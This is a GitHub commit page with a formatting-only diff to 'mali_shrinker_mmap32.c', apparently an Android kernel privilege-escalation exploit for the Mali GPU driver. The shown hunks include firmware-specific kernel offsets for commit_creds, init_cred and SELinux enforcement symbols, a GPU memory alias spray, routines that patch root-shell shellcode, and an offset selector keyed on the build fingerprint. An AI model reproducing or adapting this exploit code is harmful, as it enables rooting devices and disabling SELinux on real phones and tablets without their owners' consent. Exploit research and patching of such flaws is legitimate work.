Skip to content

Commit

Permalink
Align mali_shrinker_mmap32.c
Browse files Browse the repository at this point in the history 
Signed-off-by: Syuugo <[email protected]>
  • Loading branch information
@s1204IT
s1204IT authored Jun 11, 2024
1 parent 28b26ca commit cfc8d20
Showing 1 changed file with 8 additions and 11 deletions.
19 changes: 8 additions & 11 deletions mali_shrinker_mmap32.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include "stdbool.h"
#include <stdbool.h>
#include <sys/system_properties.h>
#include <sys/syscall.h>

Expand All @@ -21,8 +21,7 @@
#else
#include <android/log.h>
#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)

#endif // SHELL
#endif

#define MALI "/dev/mali0"

Expand Down Expand Up @@ -86,14 +85,15 @@ ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
*/

// TAB-A05-BD 01.00.000
#define COMMIT_CREDS_CTX_01_00_000 0x5a120
#define AVC_DENY_CTX_01_00_000 0x35acc8
#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc
#define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80
#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8
#define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80
#define INIT_CRED_CTX_01_00_000 0x11553f0
#define COMMIT_CREDS_CTX_01_00_000 0x5a120
#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc
#define ADD_INIT_CTX_01_00_000 0x910fc000
#define ADD_COMMIT_CTX_01_00_000 0x91048108
#define AVC_DENY_CTX_01_00_000 0x35acc8

// TAB-A05-BD 01.01.001
#define COMMIT_CREDS_CTX_01_01_001 0x5a120
Expand Down Expand Up @@ -468,14 +468,14 @@ uint64_t alias_sprayed_regions(int mali_fd) {
alias.in.aliasing_info = (uint64_t)(&(ai[0]));
mem_alias(mali_fd, &alias);
printf("alias gpu va %llx\n", alias.out.gpu_va);
/*
/*
uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES;
void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
if (region == MAP_FAILED) {
err(1, "mmap alias failed");
}
alias_regions[0] = region;
*/
*/
for (int i = 0; i < SPRAY_NUM; i++) {
void* this_region = mmap64(NULL, 0x1000 * SPRAY_PAGES, PROT_READ, MAP_SHARED, mali_fd, (uint64_t)alias.out.gpu_va + i * 0x1000 * SPRAY_PAGES);
if (this_region == MAP_FAILED) {
Expand Down Expand Up @@ -566,7 +566,6 @@ void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_en
}

void fixup_root_shell_nop() {

// Sets x0 to init_cred
root_code[ADRP_INIT_INDEX] = 0xD503201F;
root_code[ADD_INIT_INDEX] = 0xD503201F;
Expand Down Expand Up @@ -725,7 +724,6 @@ int run_enforce_un() {
return result;
}


void select_offset() {
char fingerprint[256];
int len = __system_property_get("ro.build.fingerprint", fingerprint);
Expand Down Expand Up @@ -940,7 +938,6 @@ int main() {
void* tracking_page = setup_tracking_page(mali_fd);
jit_init(mali_fd, 0x1000, 100, 0);


int mali_fd2 = open_dev(MALI);
setup_mali(mali_fd2, 1);
setup_tracking_page(mali_fd2);
Expand Down

0 comments on commit cfc8d20

Please sign in to comment.